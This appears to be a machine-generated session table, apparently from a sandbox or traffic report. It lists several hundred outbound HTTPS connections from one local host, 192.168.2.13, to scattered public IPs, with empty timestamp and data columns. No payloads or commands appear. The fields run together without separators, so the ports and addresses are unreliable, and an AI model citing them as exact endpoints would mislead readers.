                                        14829192.168.2.1342214104.135.15.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14830192.168.2.1334238184.31.65.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14831192.168.2.1354506219.163.198.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14832192.168.2.1346308201.1.226.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14833192.168.2.133406020.29.153.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14834192.168.2.1339848167.172.175.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14835192.168.2.1332898182.116.108.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14836192.168.2.1343064110.57.66.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14837192.168.2.1346786117.138.190.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14838192.168.2.1345684213.84.139.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14839192.168.2.1347170115.79.184.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14840192.168.2.1357404180.70.253.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14841192.168.2.1355268162.86.152.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14842192.168.2.134532283.30.79.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14843192.168.2.1358808140.133.23.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14844192.168.2.1341158125.77.0.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14845192.168.2.1353714126.128.16.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14846192.168.2.133508697.67.54.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14847192.168.2.1335516189.156.25.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14848192.168.2.1342686159.31.75.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14849192.168.2.1359288110.85.143.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14850192.168.2.1346448136.35.49.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14851192.168.2.1354590191.212.137.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14852192.168.2.135456671.175.210.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14853192.168.2.134357653.151.13.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14854192.168.2.134541259.151.172.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14855192.168.2.1337844145.220.69.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14856192.168.2.1345678107.101.245.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14857192.168.2.134140469.207.226.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14858192.168.2.1356396223.2.72.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14859192.168.2.136055076.70.140.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14860192.168.2.133940275.145.134.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14861192.168.2.1354426221.165.18.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14862192.168.2.1360596125.132.134.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14863192.168.2.1336550211.30.232.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14864192.168.2.134067679.20.254.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14865192.168.2.1352084147.209.31.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14866192.168.2.1357142160.147.14.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14867192.168.2.1333362222.9.238.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14868192.168.2.1343404173.32.88.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14869192.168.2.1351932180.202.38.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14870192.168.2.135684093.111.65.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14871192.168.2.133676262.173.178.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14872192.168.2.1333254217.244.147.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14873192.168.2.134385085.249.219.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14874192.168.2.134577052.221.242.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14875192.168.2.134577834.73.177.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14876192.168.2.1355304110.97.169.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14877192.168.2.134824472.126.213.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14878192.168.2.134168282.170.43.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14879192.168.2.135220053.25.52.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14880192.168.2.1341966145.162.43.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14881192.168.2.133543427.154.127.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14882192.168.2.1343232198.188.212.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14883192.168.2.1337146159.193.187.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14884192.168.2.1359668123.241.201.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14885192.168.2.1340418187.45.250.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14886192.168.2.133356851.250.253.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14887192.168.2.1360690175.46.11.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14888192.168.2.1352680105.70.188.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14889192.168.2.136092647.197.184.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14890192.168.2.1338714186.19.72.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14891192.168.2.134301469.30.161.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14892192.168.2.134729041.234.79.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14893192.168.2.1358262132.103.182.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14894192.168.2.1360464195.90.124.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14895192.168.2.134711454.130.210.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14896192.168.2.1353408126.133.122.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14897192.168.2.1335148178.225.55.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14898192.168.2.1355822156.40.108.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14899192.168.2.1333694180.219.38.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14900192.168.2.1355386164.60.168.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14901192.168.2.135887090.251.107.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14902192.168.2.133406219.30.201.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14903192.168.2.133468445.204.10.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14904192.168.2.136014492.138.195.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14905192.168.2.134611471.117.46.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14906192.168.2.134365035.48.84.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14907192.168.2.1339200124.108.69.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14908192.168.2.1334084132.196.54.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14909192.168.2.1337282184.237.18.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14910192.168.2.133447263.89.99.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14911192.168.2.1359544213.166.184.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14912192.168.2.1346424189.193.230.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14913192.168.2.1359474207.11.133.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14914192.168.2.1345072129.248.30.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14915192.168.2.1343122216.224.253.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14916192.168.2.1342264210.203.85.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14917192.168.2.1355402185.245.167.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14918192.168.2.1333152178.139.92.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14919192.168.2.13504284.198.81.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14920192.168.2.135676844.204.179.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14921192.168.2.134667848.220.255.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14922192.168.2.135845840.225.36.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14923192.168.2.135976260.197.139.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14924192.168.2.1353008143.191.234.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14925192.168.2.1341990193.149.8.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14926192.168.2.1357884219.215.23.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14927192.168.2.1359758189.44.59.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14928192.168.2.1348786198.107.217.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14929192.168.2.1351718160.39.38.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14930192.168.2.1343096204.63.39.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14931192.168.2.1357730107.158.33.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14932192.168.2.1340950105.79.82.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14933192.168.2.1346564109.172.186.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14934192.168.2.134329890.212.89.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14935192.168.2.1355894216.39.172.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14936192.168.2.134864468.196.204.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14937192.168.2.13547561.152.77.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14938192.168.2.134973277.245.168.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14939192.168.2.1340456145.157.176.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14940192.168.2.1349954155.207.57.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14941192.168.2.135968686.206.219.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14942192.168.2.1347748222.90.147.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14943192.168.2.1335880218.117.219.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14944192.168.2.1343320206.77.166.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14945192.168.2.135743838.39.227.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14946192.168.2.1357848213.30.206.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14947192.168.2.1357586174.175.130.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14948192.168.2.1351542153.253.7.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14949192.168.2.1343858125.44.212.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14950192.168.2.1342688198.81.254.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14951192.168.2.1357674124.187.58.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14952192.168.2.134114423.246.240.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14953192.168.2.1346116152.41.97.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14954192.168.2.1342646179.244.156.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14955192.168.2.133916276.251.116.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14956192.168.2.134959037.177.11.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14957192.168.2.134885887.79.146.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14958192.168.2.1349602138.57.136.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14959192.168.2.134017481.69.177.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14960192.168.2.1352160100.253.111.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14961192.168.2.1351362128.244.240.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14962192.168.2.1342872139.136.226.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14963192.168.2.135447448.55.121.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14964192.168.2.133870640.47.91.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14965192.168.2.134730265.75.94.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14966192.168.2.1335556133.98.71.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14967192.168.2.1347416119.14.178.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14968192.168.2.134052663.43.92.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14969192.168.2.134931666.238.166.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14970192.168.2.1359646113.76.162.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14971192.168.2.133942074.250.79.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14972192.168.2.1345584155.54.172.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14973192.168.2.134459654.136.202.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14974192.168.2.135556624.240.208.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14975192.168.2.134025043.218.146.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14976192.168.2.136051058.61.15.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14977192.168.2.135488024.99.223.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14978192.168.2.133798451.140.4.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14979192.168.2.1344590140.245.223.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14980192.168.2.1357566193.243.209.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14981192.168.2.134383027.163.224.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14982192.168.2.135835070.116.165.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14983192.168.2.1351358132.151.189.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14984192.168.2.13372422.230.122.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14985192.168.2.134601495.44.224.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14986192.168.2.1336018209.38.166.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14987192.168.2.133888896.227.16.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14988192.168.2.1337408182.234.9.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14989192.168.2.1355450100.10.192.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14990192.168.2.1342794177.238.234.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14991192.168.2.1337300203.118.150.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14992192.168.2.1358382174.234.82.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14993192.168.2.135923657.239.197.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14994192.168.2.1357056208.64.131.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14995192.168.2.1339034207.18.146.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14996192.168.2.134189445.118.153.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14997192.168.2.1337002156.143.152.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14998192.168.2.1342958217.231.16.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14999192.168.2.135292051.7.82.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15000192.168.2.1345272117.95.93.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15001192.168.2.1356718222.84.115.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15002192.168.2.134566699.223.113.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15003192.168.2.1336174147.56.70.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15004192.168.2.135129659.11.143.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15005192.168.2.133598286.180.153.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15006192.168.2.1354508177.156.163.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15007192.168.2.1353806155.4.243.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15008192.168.2.133421639.196.243.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15009192.168.2.1339622105.158.79.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15010192.168.2.1343810167.151.248.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15011192.168.2.13568108.137.44.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15012192.168.2.135622458.182.153.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15013192.168.2.133394282.109.119.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15014192.168.2.135672064.88.54.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15015192.168.2.1346836144.63.173.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15016192.168.2.1355022120.253.108.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15017192.168.2.135917439.222.31.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15018192.168.2.1360688207.112.77.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15019192.168.2.1339134161.48.39.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15020192.168.2.135898270.227.73.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15021192.168.2.133313479.75.167.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15022192.168.2.134988669.125.78.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15023192.168.2.1342108128.138.59.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15024192.168.2.1347756117.11.21.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15025192.168.2.1336338164.144.70.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15026192.168.2.135602687.73.91.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15027192.168.2.1349938147.3.38.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15028192.168.2.1356066112.213.16.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15029192.168.2.1335212102.212.148.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15030192.168.2.1346948179.182.176.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15031192.168.2.134274836.118.128.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15032192.168.2.134499082.235.207.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15033192.168.2.1339602116.56.224.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15034192.168.2.1359430179.194.103.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15035192.168.2.1341182184.83.68.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15036192.168.2.1354132153.40.77.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15037192.168.2.136000648.101.116.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15038192.168.2.1342804123.125.69.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15039192.168.2.1343352146.27.52.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15040192.168.2.134981894.58.95.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15041192.168.2.13383781.59.106.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15042192.168.2.135609852.130.30.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15043192.168.2.1352918200.209.152.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15044192.168.2.1341114129.119.4.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15045192.168.2.134967883.170.79.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15046192.168.2.1342358167.62.34.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15047192.168.2.1348814172.171.53.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15048192.168.2.133456292.88.217.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15049192.168.2.134008620.74.69.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15050192.168.2.1336252211.123.200.196443
                                        TimestampBytes transferredDirectionData


